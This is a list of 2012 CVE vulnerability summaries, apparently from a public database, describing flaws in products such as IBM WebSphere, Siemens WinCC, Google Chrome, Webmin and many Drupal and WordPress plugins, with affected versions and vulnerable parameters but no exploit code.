[CVE-2012-3294] Multiple cross-site request forgery (CSRF) vulnerabilities in the Web Gateway component in IBM WebSphere MQ File Transfer Edition 7.0.4 and earlier, and WebSphere MQ - Managed File Transfer 7.5, allow remote attackers to hijack the authentication of arbitrary users for requests that (1) add user accounts via the /wmqfteconsole/Filespaces URI, (2) modify permissions via the /wmqfteconsole/FileSpacePermisssions URI, or (3) add MQ Message Descriptor (MQMD) user accounts via the /wmqfteconsole/UploadUsers URI.
[CVE-2012-3293] Cross-site scripting (XSS) vulnerability in the Administrative Console in IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.45, 7.0.x before 7.0.0.25, 8.0.x before 8.0.0.4, and 8.5.x before 8.5.0.1 allows remote attackers to inject arbitrary web script or HTML via vectors involving FRAME elements, related to a cross-frame scripting (XFS) issue.
[CVE-2012-3279] Multiple cross-site scripting (XSS) vulnerabilities in HP Network Node Manager i (NNMi) 8.x, 9.0x, 9.1x, and 9.20 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-3272] Cross-site scripting (XSS) vulnerability on the HP Color LaserJet CM3530 with firmware before 53.190.9, Color LaserJet CM60xx with firmware before 52.210.9, Color LaserJet CP3525 with firmware before 06.140.3 18, Color LaserJet CP4xxx with firmware before 07.120.6, Color LaserJet CP6015 with firmware before 04.160.3, LaserJet P3015 with firmware before 07.140.3, and LaserJet P4xxx with firmware before 04.170.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-3257] HP Business Availability Center (BAC) 8.07 allows remote authenticated users to hijack web sessions via unspecified vectors.
[CVE-2012-3255] Cross-site scripting (XSS) vulnerability in HP Business Availability Center (BAC) 8.07 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-3251] Cross-site scripting (XSS) vulnerability in HP Service Manager Web Tier 7.11, 9.21, and 9.30, and HP Service Center Web Tier 6.28, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-3238] Cross-site scripting (XSS) vulnerability in the Backup/Restore component in WebAdmin in Astaro Security Gateway before 8.305 allows remote attackers to inject arbitrary web script or HTML via the "Comment (optional)" field.
[CVE-2012-3233] Cross-site scripting (XSS) vulnerability in __swift/thirdparty/PHPExcel/PHPExcel/Shared/JAMA/docs/download.php in Kayako Fusion 4.40.1148, and possibly before 4.50.1581, allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2012-3232] Cross-site scripting (XSS) vulnerability in search.php in web@all 2.0, as downloaded before May 30, 2012, allows remote attackers to inject arbitrary web script or HTML via the _text[title] parameter.
[CVE-2012-3231] Multiple cross-site request forgery (CSRF) vulnerabilities in web@all 2.0, as downloaded before May 30, 2012, allow remote attackers to hijack the authentication of administrators for requests that add, delete, or modify sensitive information, as demonstrated by adding a file to execute arbitrary code via a do_addfile action to inc/browser/action.php.
[CVE-2012-3186] Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, and 11.1.1.6.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Advanced UI.
[CVE-2012-3185] Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, and 11.1.1.6.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Advanced UI.
[CVE-2012-3184] Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, and 11.1.1.6.0 allows remote attackers to affect integrity via unknown vectors related to Advanced UI.
[CVE-2012-3183] Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, and 11.1.1.6.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Advanced UI.
[CVE-2012-3161] Unspecified vulnerability in the Oracle Agile PLM Framework component in Oracle Supply Chain Products Suite 9.3.1.1 allows remote attackers to affect integrity via unknown vectors related to Web Client (CS).
[CVE-2012-3105] The glBufferData function in the WebGL implementation in Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10 does not properly mitigate an unspecified flaw in an NVIDIA driver, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors, a related issue to CVE-2011-3101.
[CVE-2012-3057] Heap-based buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP11, T27 LD before SP32 CP2, and T28 L10N before SP1 allows remote attackers to execute arbitrary code via a crafted size field in audio data within a WRF file, aka Bug ID CSCtz00755.
[CVE-2012-3056] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP11, T27 LD before SP32 CP2, and T28 L10N before SP1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted WRF file, aka Bug ID CSCtz72946.
[CVE-2012-3055] Stack-based buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP11, T27 LD before SP32 CP2, and T28 L10N before SP1 allows remote attackers to execute arbitrary code via a crafted DHT chunk in a JPEG image within a WRF file, aka Bug ID CSCtz72953.
[CVE-2012-3054] Heap-based buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP11, T27 LD before SP32 CP2, and T28 L10N before SP1 allows remote attackers to execute arbitrary code via a crafted WRF file, aka Bug ID CSCtz72977.
[CVE-2012-3053] Buffer overflow in the Cisco WebEx Advanced Recording Format (ARF) player T27 L through SP11 EP26, T27 LB through SP21 EP10, T27 LC before SP25 EP11, T27 LD before SP32 CP2, and T28 L10N before SP1 allows remote attackers to execute arbitrary code via a crafted ARF file, aka Bug ID CSCtz72985.
[CVE-2012-3040] Cross-site scripting (XSS) vulnerability in the web server on Siemens SIMATIC S7-1200 PLCs 2.x through 3.0.1 allows remote attackers to inject arbitrary web script or HTML via a crafted URI.
[CVE-2012-3037] The Siemens SIMATIC S7-1200 2.x PLC does not properly protect the private key of the SIMATIC CONTROLLER Certification Authority certificate, which allows remote attackers to spoof the S7-1200 web server by using this key to create a forged certificate.
[CVE-2012-3034] WebNavigator in Siemens WinCC 7.0 SP3 and earlier, as used in SIMATIC PCS7 and other products, allows remote attackers to discover a username and password via crafted parameters to unspecified methods in ActiveX controls.
[CVE-2012-3032] SQL injection vulnerability in WebNavigator in Siemens WinCC 7.0 SP3 and earlier, as used in SIMATIC PCS7 and other products, allows remote attackers to execute arbitrary SQL commands via a crafted SOAP message.
[CVE-2012-3031] Multiple cross-site scripting (XSS) vulnerabilities in WebNavigator in Siemens WinCC 7.0 SP3 and earlier, as used in SIMATIC PCS7 and other products, allow remote attackers to inject arbitrary web script or HTML via a (1) GET parameter, (2) POST parameter, or (3) Referer HTTP header.
[CVE-2012-3030] WebNavigator in Siemens WinCC 7.0 SP3 and earlier, as used in SIMATIC PCS7 and other products, stores sensitive information under the web root with insufficient access control, which allows remote attackers to read a (1) log file or (2) configuration file via a direct request.
[CVE-2012-3028] Cross-site request forgery (CSRF) vulnerability in WebNavigator in Siemens WinCC 7.0 SP3 and earlier, as used in SIMATIC PCS7 and other products, allows remote attackers to hijack the authentication of arbitrary users for requests that modify data or cause a denial of service.
[CVE-2012-3026] rifsrvd.exe in the Remote Interface Service in GE Intelligent Platforms Proficy Real-Time Information Portal 2.6 through 3.5 SP1 allows remote attackers to cause a denial of service (memory corruption and service crash) or possibly execute arbitrary code via long input data, a different vulnerability than CVE-2012-3010 and CVE-2012-3021.
[CVE-2012-3022] The SaveToFile method in a certain ActiveX control in TrendDisplay.dll in Canary Labs TrendLink 9.0.2.27051 and earlier does not properly restrict the creation of files, which allows remote attackers to download an arbitrary program onto a client machine, and execute this program, via a crafted web site.
[CVE-2012-3021] rifsrvd.exe in the Remote Interface Service in GE Intelligent Platforms Proficy Real-Time Information Portal 2.6 through 3.5 SP1 allows remote attackers to cause a denial of service (memory corruption and service crash) or possibly execute arbitrary code via long input data, a different vulnerability than CVE-2012-3010 and CVE-2012-3026.
[CVE-2012-3020] The Siemens Synco OZW Web Server devices OZW672.*, OZW772.*, and OZW775 with firmware before 4 have an unspecified default password, which makes it easier for remote attackers to obtain administrative access via a network session.
[CVE-2012-3013] WAGO I/O System 758 model 758-870, 758-874, 758-875, and 758-876 Industrial PC (IPC) devices have default passwords for unspecified Web Based Management accounts, which makes it easier for remote attackers to obtain administrative access via a TCP session.
[CVE-2012-3011] Directory traversal vulnerability in the web server in Fultek WinTr Scada 4.0.5 and earlier allows remote attackers to read arbitrary files via a crafted request.
[CVE-2012-3010] rifsrvd.exe in the Remote Interface Service in GE Intelligent Platforms Proficy Real-Time Information Portal 2.6 through 3.5 SP1 allows remote attackers to cause a denial of service (memory corruption and service crash) or possibly execute arbitrary code via long input data, a different vulnerability than CVE-2012-3021 and CVE-2012-3026.
[CVE-2012-3008] Stack-based buffer overflow in OSIsoft PI OPC DA Interface before 2.3.20.9 allows remote authenticated users to execute arbitrary code by sending packet data during the processing of messages associated with OPC items.
[CVE-2012-3003] Open redirect vulnerability in an unspecified web application in Siemens WinCC 7.0 SP3 before Update 2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a GET request.
[CVE-2012-3001] Mutiny Standard before 4.5-1.12 allows remote attackers to execute arbitrary commands via the network-interface menu, related to a "command injection vulnerability."
[CVE-2012-2995] Multiple cross-site scripting (XSS) vulnerabilities in Trend Micro InterScan Messaging Security Suite 7.1-Build_Win32_1394 allow remote attackers to inject arbitrary web script or HTML via (1) the wrsApprovedURL parameter to addRuleAttrWrsApproveUrl.imss or (2) the src parameter to initUpdSchPage.imss.
[CVE-2012-2985] Cross-site scripting (XSS) vulnerability in InsertDocument.aspx in CuteSoft Cute Editor 6.4 allows remote authenticated users to inject arbitrary web script or HTML via the _UploadID parameter.
[CVE-2012-2984] Multiple cross-site scripting (XSS) vulnerabilities in monitor/m_overview.ink in Websense Content Gateway before 7.7.3 allow remote attackers to inject arbitrary web script or HTML via the (1) menu or (2) item parameter.
[CVE-2012-2983] file/edit_html.cgi in Webmin 1.590 and earlier does not perform an authorization check before showing a file's unedited contents, which allows remote attackers to read arbitrary files via the file field.
[CVE-2012-2982] file/show.cgi in Webmin 1.590 and earlier allows remote authenticated users to execute arbitrary commands via an invalid character in a pathname, as demonstrated by a | (pipe) character.
[CVE-2012-2981] Webmin 1.590 and earlier allows remote authenticated users to execute arbitrary Perl code via a crafted file associated with the type (aka monitor type name) parameter.
[CVE-2012-2977] The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to change arbitrary passwords via crafted input to an application script.
[CVE-2012-2976] The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary shell commands via crafted input to application scripts, related to an "injection" issue.
[CVE-2012-2975] Cross-site scripting (XSS) vulnerability in the traffic overview page on the F5 ASM appliance 10.0.0 through 11.2.0 HF2 allows remote attackers to inject arbitrary web script or HTML via crafted requests that are later listed on a summary page.
[CVE-2012-2961] SQL injection vulnerability in the management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
[CVE-2012-2960] Cross-site scripting (XSS) vulnerability in the import functionality in HP ArcSight Connector appliance 6.2.0.6244.0 and ArcSight Logger appliance 5.2.0.6288.0 allows remote attackers to inject arbitrary web script or HTML via a crafted file.
[CVE-2012-2957] The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows local users to gain privileges by modifying files, related to a "file inclusion" issue.
[CVE-2012-2953] The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary commands via crafted input to application scripts.
[CVE-2012-2941] Cross-site scripting (XSS) vulnerability in search/ in Yandex.Server 2010 9.0 Enterprise allows remote attackers to inject arbitrary web script or HTML via the text parameter.
[CVE-2012-2938] Multiple cross-site scripting (XSS) vulnerabilities in Travelon Express 6.2.2 allow remote attackers to inject arbitrary web script or HTML via the holiday name field to (1) holiday_add.php or (2) holiday_view.php.
[CVE-2012-2936] Multiple cross-site scripting (XSS) vulnerabilities in Pligg CMS before 1.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) user or (2) page parameter to (a) admin/admin_comments.php or (b) admin/admin_links.php.
[CVE-2012-2935] Cross-site scripting (XSS) vulnerability in osCommerce/OM/Core/Site/Shop/Application/Checkout/pages/main.php in OSCommerce Online Merchant 3.0.2 allows remote attackers to inject arbitrary web script or HTML via the value_title parameter, a different vulnerability than CVE-2012-1059.
[CVE-2012-2920] Cross-site scripting (XSS) vulnerability in the userphoto_options_page function in user-photo.php in the User Photo plugin before 0.9.5.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to wp-admin/options-general.php. NOTE: some of these details are obtained from third party information.
[CVE-2012-2918] Cross-site scripting (XSS) vulnerability in Upload/engine.php in Chevereto 1.91 allows remote attackers to inject arbitrary web script or HTML via the v parameter.
[CVE-2012-2917] Cross-site scripting (XSS) vulnerability in the Share and Follow plugin 1.80.3 for WordPress allows remote attackers to inject arbitrary web script or HTML via the CDN API Key (cnd-key) in a share-and-follow-menu page to wp-admin/admin.php.
[CVE-2012-2916] Cross-site scripting (XSS) vulnerability in sabre_class_admin.php in the SABRE plugin before 2.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the active_option parameter to wp-admin/tools.php.
[CVE-2012-2914] Cross-site scripting (XSS) vulnerability in captchademo.php in Unijimpe Captcha allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2012-2913] Multiple cross-site scripting (XSS) vulnerabilities in the Leaflet plugin 0.0.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) leaflet_layer.php or (2) leaflet_marker.php, as reachable through wp-admin/admin.php.
[CVE-2012-2912] Multiple cross-site scripting (XSS) vulnerabilities in the LeagueManager plugin 3.7 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) group parameter in the show-league page or (2) season parameter in the team page to wp-admin/admin.php.
[CVE-2012-2911] Cross-site scripting (XSS) vulnerability in backupDB.php in SiliSoftware backupDB() 1.2.7a allows remote attackers to inject arbitrary web script or HTML via the onlyDB parameter.
[CVE-2012-2910] Multiple cross-site scripting (XSS) vulnerabilities in SiliSoftware phpThumb() 1.7.11 allow remote attackers to inject arbitrary web script or HTML via the (1) dir parameter to demo/phpThumb.demo.random.php or (2) title parameter to demo/phpThumb.demo.showpic.php.
[CVE-2012-2909] Multiple cross-site scripting (XSS) vulnerabilities in Viscacha 0.8.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) text field in the Private Messages System, (2) Bad Word field in Zensur, or (3) Portal or (4) Topic field in Kommentar.
[CVE-2012-2907] Cross-site scripting (XSS) vulnerability in the aberdeen_breadcrumb function in template.php in the Aberdeen theme 6.x-1.x before 6.x-1.11 for Drupal, when set to append the content title to the breadcrumb, allows remote attackers to inject arbitrary web script or HTML via the content title in a breadcrumb.
[CVE-2012-2906] Multiple cross-site scripting (XSS) vulnerabilities in artpublic/recommandation/index.php in Artiphp CMS 5.5.0 Neo (r422) allow remote attackers to inject arbitrary web script or HTML via the (1) add_img_name_post, (2) asciiart_post, (3) expediteur, (4) titre_sav, or (5) z39d27af885b32758ac0e7d4014a61561 parameter.
[CVE-2012-2905] Artiphp CMS 5.5.0 Neo (r422) stores database backups with predictable names under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request.
[CVE-2012-2904] player.swf in LongTail JW Player 5.9 allows remote attackers to conduct cross-site scripting (XSS) attacks to inject arbitrary web script or HTML via multiple "javascript:" sequences in the debug parameter.
[CVE-2012-2903] Multiple cross-site scripting (XSS) vulnerabilities in PHP Address Book 7.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO to group.php, or the (2) target_language or (3) target_flag parameter to translate.php.
[CVE-2012-2901] Cross-site scripting (XSS) vulnerability in the Profile List in the Joomla Content Editor (JCE) component before 2.1 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the search parameter to administrator/index.php.
[CVE-2012-2896] Integer overflow in the WebGL implementation in Google Chrome before 22.0.1229.79 on Mac OS X allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
[CVE-2012-2889] Cross-site scripting (XSS) vulnerability in Google Chrome before 22.0.1229.79 allows remote attackers to inject arbitrary web script or HTML via vectors involving frames, aka "Universal XSS (UXSS)."
[CVE-2012-2886] Cross-site scripting (XSS) vulnerability in Google Chrome before 22.0.1229.79 allows remote attackers to inject arbitrary web script or HTML via vectors related to the Google V8 bindings, aka "Universal XSS (UXSS)."
[CVE-2012-2872] Cross-site scripting (XSS) vulnerability in an SSL interstitial page in Google Chrome before 21.0.1180.89 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2860] The date-picker implementation in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows user-assisted remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted web site.
[CVE-2012-2858] Buffer overflow in the WebP decoder in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted WebP image.
[CVE-2012-2854] Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to obtain potentially sensitive information about pointer values by leveraging access to a WebUI renderer process.
[CVE-2012-2853] The webRequest API in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, does not properly interact with the Chrome Web Store, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted web site.
[CVE-2012-2848] The drag-and-drop implementation in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows user-assisted remote attackers to bypass intended file access restrictions via a crafted web site.
[CVE-2012-2847] Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, does not request user confirmation before continuing a large series of downloads, which allows user-assisted remote attackers to cause a denial of service (resource consumption) via a crafted web site.
[CVE-2012-2819] The texSubImage2D implementation in the WebGL subsystem in Google Chrome before 20.0.1132.43 does not properly handle uploads to floating-point textures, which allows remote attackers to cause a denial of service (assertion failure and application crash) or possibly have unspecified other impact via a crafted web page, as demonstrated by certain WebGL performance tests, aka rdar problem 11520387.
[CVE-2012-2769] Multiple cross-site scripting (XSS) vulnerabilities in the topic administration page in the Extension::MobileUI extension before 1.02 for Best Practical Solutions RT 3.8.x and in Best Practical Solutions RT before 4.0.6 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2768] Multiple cross-site scripting (XSS) vulnerabilities in the topic administration page in the RTFM extension 2.0.4 through 2.4.3 for Best Practical Solutions RT allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2759] Cross-site scripting (XSS) vulnerability in login-with-ajax.php in the Login With Ajax (aka login-with-ajax) plugin before 3.0.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the callback parameter in a lostpassword action to wp-login.php.
[CVE-2012-2741] Cross-site scripting (XSS) vulnerability in public_html/lists/admin/ in phpList before 2.10.18 allows remote attackers to inject arbitrary web script or HTML via the num parameter in a reconcileusers action.
[CVE-2012-2735] Session fixation vulnerability in Cumin before 0.1.5444, as used in Red Hat Enterprise Messaging, Realtime, and Grid (MRG) 2.0, allows remote attackers to hijack web sessions via a crafted session cookie.
[CVE-2012-2731] The Ubercart AJAX Cart 6.x-2.x before 6.x-2.1 for Drupal stores the PHP session id in the JavaScript settings array in page loads, which might allow remote attackers to obtain sensitive information by sniffing or reading the cache of the HTML of a webpage.
[CVE-2012-2727] Open redirect vulnerability in the Janrain Capture module 6.x-1.0 and 7.x-1.0 for Drupal, when synchronizing user data, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the destination parameter.
[CVE-2012-2726] Cross-site scripting (XSS) vulnerability in the Protest module 6.x-1.x before 6.x-1.2 or 7.x-1.x before 7.x-1.2 for Drupal allows remote authenticated users with the "administer protest" permission to inject arbitrary web script or HTML via the protest_body parameter.
[CVE-2012-2723] Cross-site scripting (XSS) vulnerability in the Maestro module 7.x-1.x before 7.x-1.2 for Drupal allows remote authenticated users with maestro admin permissions to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2722] The node selection interface in the WYSIWYG editor (CKEditor) in the Node Embed module 6.x-1.x before 6.x-1.5 and 7.x-1.x before 7.x-1.0 for Drupal does not properly check permissions, which allows remote attackers to bypass intended access restrictions and read node titles.
[CVE-2012-2717] Multiple cross-site scripting (XSS) vulnerabilities in the Mobile Tools module 6.x-2.x before 6.x-2.3 for Drupal allow remote attackers to inject arbitrary web script or HTML via the (1) Mobile URL field or (2) Desktop URL field to the General configuration page, or the (3) message to the Mobile Tools block message options.
[CVE-2012-2715] Cross-site scripting (XSS) vulnerability in the themes_links function in template.php in the Amadou theme module 6.x-1.x before 6.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors related to class attributes in a list of links.
[CVE-2012-2713] Cross-site request forgery (CSRF) vulnerability in the BrowserID (Mozilla Persona) module 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to hijack the authentication of arbitrary users for requests that login a user to another web site.
[CVE-2012-2712] Multiple cross-site scripting (XSS) vulnerabilities in the Search API module 7.x-1.x before 7.x-1.1 for Drupal, when supporting manual entry of field identifiers, allow remote attackers to inject arbitrary web script or HTML via vectors related to thrown exceptions and logging errors.
[CVE-2012-2711] Multiple cross-site scripting (XSS) vulnerabilities in the Taxonomy List module 6.x-1.x before 6.x-1.4 for Drupal allow remote authenticated users with create or edit taxonomy terms permissions to inject arbitrary web script or HTML via vectors related to taxonomy information.
[CVE-2012-2710] Cross-site scripting (XSS) vulnerability in the Zen module 6.x-1.x before 6.x-1.1 for Drupal, when "Append the content title to the end of the breadcrumb" is enabled, allows remote attackers to inject arbitrary web script or HTML via the content title in a breadcrumb.
[CVE-2012-2708] Cross-site scripting (XSS) vulnerability in the _hosting_task_log_table function in modules/hosting/task/hosting_task.module in the Hostmaster (Aegir) module 6.x-1.x before 6.x-1.9 for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via a Drush log message in a provision task log.
[CVE-2012-2706] Cross-site scripting (XSS) vulnerability in the Post Affiliate Pro (PAP) module for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors related to user registration.
[CVE-2012-2703] Cross-site scripting (XSS) vulnerability in the Advertisement module 6.x-2.x before 6.x-2.3 for Drupal, when debug mode is enabled, allows remote attackers to inject arbitrary web script or HTML via vectors related to the "$conf variable in settings.php."
[CVE-2012-2698] Cross-site scripting (XSS) vulnerability in the outputPage function in includes/SkinTemplate.php in MediaWiki before 1.17.5, 1.18.x before 1.18.4, and 1.19.x before 1.19.1 allows remote attackers to inject arbitrary web script or HTML via the uselang parameter to index.php/Main_page.
[CVE-2012-2694] actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails before 3.0.14, 3.1.x before 3.1.6, and 3.2.x before 3.2.6 does not properly consider differences in parameter handling between the Active Record component and the Rack interface, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks via a crafted request, as demonstrated by certain "['xyz', nil]" values, a related issue to CVE-2012-2660.
[CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
[CVE-2012-2683] Multiple cross-site scripting (XSS) vulnerabilities in Cumin before 0.1.5444, as used in Red Hat Enterprise Messaging, Realtime, and Grid (MRG) 2.0, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) "error message displays" or (2) "in source HTML on certain pages."
[CVE-2012-2680] Cumin before 0.1.5444, as used in Red Hat Enterprise Messaging, Realtime, and Grid (MRG) 2.0, does not properly restrict access to resources, which allows remote attackers to obtain sensitive information via unspecified vectors related to (1) "web pages," (2) "export functionality," and (3) "image viewing."
[CVE-2012-2671] The Rack::Cache rubygem 0.3.0 through 1.1 caches Set-Cookie and other sensitive headers, which allows attackers to obtain sensitive cookie information, hijack web sessions, or have other unspecified impact by accessing the cache.
[CVE-2012-2667] Session fixation vulnerability in lib/user/sfBasicSecurityUser.class.php in SensioLabs Symfony before 1.4.18 allows remote attackers to hijack web sessions via vectors related to the regenerate method and unspecified "database backed session classes."
[CVE-2012-2662] Multiple cross-site scripting (XSS) vulnerabilities in Red Hat Certificate System (RHCS) before 8.1.1 and Dogtag Certificate System allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to the (1) System Agent or (2) End Entity pages.
[CVE-2012-2660] actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails before 3.0.13, 3.1.x before 3.1.5, and 3.2.x before 3.2.4 does not properly consider differences in parameter handling between the Active Record component and the Rack interface, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks via a crafted request, as demonstrated by certain "[nil]" values, a related issue to CVE-2012-2694.
[CVE-2012-2649] The Sleipnir Mobile application 2.2.0 and earlier and Sleipnir Mobile Black Edition application 2.2.0 and earlier for Android allow remote attackers to execute arbitrary Java methods, and obtain sensitive information or execute arbitrary commands, via a crafted web site.
[CVE-2012-2648] Cross-site scripting (XSS) vulnerability in the GoodReader app 3.16 and earlier for iOS on the iPad, and 3.15.1 and earlier for iOS on the iPhone and iPod touch, allows remote attackers to inject arbitrary web script or HTML via vectors involving use of this app in conjunction with a web browser.
[CVE-2012-2647] Yahoo! Toolbar 1.0.0.5 and earlier for Chrome and Safari allows remote attackers to modify the configured search URL, and intercept search terms, via a crafted web page.
[CVE-2012-2646] The Sleipnir Mobile application before 2.1.0 and Sleipnir Mobile Black Edition application before 2.1.0 for Android do not properly implement the WebView class, which allows remote attackers to obtain sensitive information via a crafted application.
[CVE-2012-2645] The Yahoo! Japan Yahoo! Browser application 1.2.0 and earlier for Android does not properly implement the WebView class, which allows remote attackers to obtain sensitive information via a crafted application.
[CVE-2012-2644] Cross-site scripting (XSS) vulnerability in the MT4i plugin 3.1 beta 4 and earlier for Movable Type allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-2642.
[CVE-2012-2643] Cross-site scripting (XSS) vulnerability in KENT-WEB YY-BOARD before 6.4 allows remote attackers to inject arbitrary web script or HTML via a crafted form entry.
[CVE-2012-2642] Cross-site scripting (XSS) vulnerability in the MT4i plugin 3.1 beta 4 and earlier for Movable Type allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-2644.
[CVE-2012-2641] Cross-site scripting (XSS) vulnerability in Zenphoto before 1.4.3 allows remote attackers to inject arbitrary web script or HTML by triggering improper interaction with an unspecified library.
[CVE-2012-2638] Cross-site scripting (XSS) vulnerability in SmallPICT.cgi in SmallPICT before 2.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2637] Cross-site scripting (XSS) vulnerability in KENT-WEB WEB PATIO 4.04 and earlier might allow remote attackers to inject arbitrary web script or HTML via a crafted cookie.
[CVE-2012-2636] Cross-site scripting (XSS) vulnerability in KENT-WEB WEB PATIO 4.04 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2635] The Dolphin Browser HD application before 7.6 and Dolphin for Pad application before 1.0.1 for Android do not properly implement the WebView class, which allows remote attackers to obtain sensitive information via a crafted application.
[CVE-2012-2634] Cross-site scripting (XSS) vulnerability in FeedDemon before 4.0, when the feed preview option is enabled, allows remote attackers to inject arbitrary web script or HTML via a feed.
[CVE-2012-2633] Cross-site scripting (XSS) vulnerability in wassup.php in the WassUp plugin before 1.8.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header.
[CVE-2012-2631] Cross-site scripting (XSS) vulnerability in WEBLOGIC @WEB ShoppingCart before 1.5.2.0, and @WEB ShoppingCart T 1.5.0.1 and earlier, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2627] d4d/uploader.php in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allows remote attackers to create or overwrite arbitrary files in %PROGRAMFILES%\Scrutinizer\snmp\mibs\ via a multipart/form-data POST request.
[CVE-2012-2626] cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action.
[CVE-2012-2605] Multiple cross-site request forgery (CSRF) vulnerabilities in the administrative interface in Bradford Network Sentry before 5.3.3 allow remote attackers to hijack the authentication of administrators for requests that (1) insert XSS sequences or (2) send messages to clients.
[CVE-2012-2598] Buffer overflow in the DiagAgent web server in Siemens WinCC 7.0 SP3 through Update 2 allows remote attackers to cause a denial of service (agent outage) via crafted input.
[CVE-2012-2596] The XPath functionality in unspecified web applications in Siemens WinCC 7.0 SP3 before Update 2 does not properly handle special characters in parameters, which allows remote authenticated users to read or modify settings via a crafted URL, related to an "XML injection" attack.
